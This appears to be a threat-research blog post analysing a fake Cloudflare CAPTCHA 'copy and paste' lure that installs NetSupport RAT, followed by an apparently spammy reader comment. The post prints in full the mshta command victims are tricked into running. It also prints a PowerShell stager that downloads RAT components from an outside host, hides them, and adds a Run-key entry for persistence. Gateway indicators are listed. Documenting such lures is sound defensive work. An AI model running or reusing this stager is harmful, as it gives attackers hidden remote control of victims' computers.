Cloudflare CAPTCHA copy & paste malware NetSupport RAT
hacked website redirects to
eiesoft.com
https://urlscan.io/result/87495eb7-071f-499e-aeb5-a3b08b9f7e48/
"C:\windows\system32\mshta.exe" http://eiesoft[.]com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: xxx''1.0
which executes powershell that downloads NetSupport RAT
ipconfig /flushdns $randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_}) $randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName New-Item -ItemType Directory -Path $randomFolderPath $Pach = $randomFolderPath $Run = 'HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run'; cmd /c attrib +h $Pach $url = "http://hardcorelegends[.]com/a/1.png" $url2 = "http://hardcorelegends[.]com/a/2.png" $url3 = "http://hardcorelegends[.]com/a/3.png" $url4 = "http://hardcorelegends[.]com/a/4.png" $url5 = "http://hardcorelegends[.]com/a/5.png" $url6 = "http://hardcorelegends[.]com/a/6.png" $url7 = "http://hardcorelegends[.]com/a/7.png" $url8 = "http://hardcorelegends[.]com/a/8.png" $url9 = "http://hardcorelegends[.]com/a/9.png" $url10 = "http://hardcorelegends[.]com/a/10.png" $url11 = "http://hardcorelegends[.]com/a/11.png" $url12 = "http://hardcorelegends[.]com/a/12.png" $file = $Pach + "\client32.ini" $file2 = $Pach + "\HTCTL32.DLL" $file3 = $Pach + "\msvcr100.dll" $file4 = $Pach + "\nskbfltr.inf" $file5 = $Pach + "\NSM.ini" $file6 = $Pach + "\NSM.LIC" $file7 = $Pach + "\pcicapi.dll" $file8 = $Pach + "\PCICHEK.DLL" $file9 = $Pach + "\PCICL32.DLL" $file10 = $Pach + "\remcmdstub.exe" $file11 = $Pach + "\TCCTL32.DLL" $file12 = $Pach + "\client32.exe" Invoke-WebRequest $url -OutFile $file Invoke-WebRequest $url2 -OutFile $file2 Invoke-WebRequest $url3 -OutFile $file3 Invoke-WebRequest $url4 -OutFile $file4 Invoke-WebRequest $url5 -OutFile $file5 Invoke-WebRequest $url6 -OutFile $file6 Invoke-WebRequest $url7 -OutFile $file7 Invoke-WebRequest $url8 -OutFile $file8 Invoke-WebRequest $url9 -OutFile $file9 Invoke-WebRequest $url10 -OutFile $file10 Invoke-WebRequest $url11 -OutFile $file11 Invoke-WebRequest $url12 -OutFile $file12 start-sleep -s 4 New-ItemProperty -Path $Run -Name 'Microsoft' -Value $file12 start-sleep -s 4 Start-Process $file12
NetSupport RAT Gateways
92.255.85[.]135
guidemytax[.]com
Cloudflare CAPTCHA pop-ups can hide sneaky copy-paste malware that silently drops NetSupport RAT on your system without you noticing. If you're mapping your atlas path of exile, be cautious malicious RATs can steal your session and compromise your progress.
ReplyDelete